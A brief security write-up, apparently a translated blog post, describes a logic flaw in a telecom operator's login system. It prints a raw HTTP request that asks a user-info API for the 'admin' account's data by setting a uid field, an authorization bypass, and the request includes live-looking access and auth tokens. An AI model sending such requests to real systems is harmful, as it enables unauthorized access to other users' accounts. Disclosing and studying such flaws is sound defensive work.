Things About Login Pages
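Sharing the approach behind a logic vulnerability found at a telecom operator. There are actually many ways to approach a login page; often you only need to be a little more careful. Vulnerable URL: xxx.xxx..xx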
```
POST /prod-api/wuyu/user/get_user_info HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;
Access_token: hN0AF2XX6+qZSAmuoOfwQHh76g8vgqovXx8b065nHsw=
Authtoken: a6d71d0278894b9aafd5b45675879a2f
Content-Length: 15
Origin: https://x
Referer: https:/x/profile/index
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: max-age=0
Te: trailers
Connection: close

{"uid":"admin"}
```